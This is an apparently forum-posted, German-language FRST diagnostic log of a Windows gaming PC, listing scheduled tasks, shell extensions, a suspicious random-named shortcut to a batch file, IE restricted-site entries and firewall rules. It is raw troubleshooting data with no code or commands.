[IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger) ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => -> Keine Datei ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation) ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Keine Datei ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> Keine Datei ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll [2017-08-08] (Dropbox, Inc.) ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff" Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.) Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation) Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd) Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation) Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-08-08] (Microsoft Corporation) Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG Task: {5695EF73-2130-43FB-B248-51C430A387A4} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation) Task: {5DA81636-2ECE-4830-AE1B-077999FE28A7} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {64670950-29B6-4622-AFED-B1C8B63CBDAB} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation) Task: {6A99B42D-8E1B-44BD-87EB-FD3F84C0DCFC} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {96B4A76A-E0A9-497A-B6C0-43AC09DF5333} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-26] (NVIDIA Corporation) Task: {98644CA8-C542-4436-AFE3-3272F8AD1B07} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {A1DC91F7-197C-4208-AE19-8D4190EB04A4} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-26] (NVIDIA Corporation) Task: {A36A36C9-7C2C-4BAB-8C32-209FE107A789} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.) Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation) Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation) Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe ==================== Verknüpfungen & WMI ======================== (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat () ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-07-18 00:26 - 2017-07-18 00:26 - 000074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2017-07-18 00:26 - 2017-07-18 00:26 - 000203264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2017-07-18 00:26 - 2017-07-18 00:26 - 043573248 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2017-07-18 00:26 - 2017-07-18 00:26 - 002435584 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\skypert.dll 2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll 2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll 2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll 2017-06-20 11:28 - 2017-06-20 11:28 - 001997792 ____R () C:\Program Files (x86)\Skype\Phone\skypert.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135] ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008k.com -> 008k.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\00hq.com -> 00hq.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0190-dialers.com -> 0190-dialers.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\01i.info -> 01i.info IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\05p.com -> 05p.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0calories.net -> 0calories.net IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0cj.net -> 0cj.net IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0scan.com -> 0scan.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-domains-registrations.com -> 1-domains-registrations.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-se.com -> 1-se.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001movie.com -> 1001movie.com IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001night.biz -> 1001night.biz IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100gal.net -> 100gal.net IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100sexlinks.com -> 100sexlinks.com Da befinden sich 4789 mehr Seiten. ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg DNS Servers: 62.2.24.162 - 62.2.17.61 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == MSCONFIG\Services: PDF Architect 5 Manager => 2 HKLM\...\StartupApproved\StartupFolder: => "UE Music Library-Taskleisten-Tool.lnk" HKLM\...\StartupApproved\StartupFolder: => "simplicheck.lnk" HKLM\...\StartupApproved\Run32: => "UpdReg" HKLM\...\StartupApproved\Run32: => "Raptr" HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk" HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\Run: => "BingSvc" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [TCP Query User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [UDP Query User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) 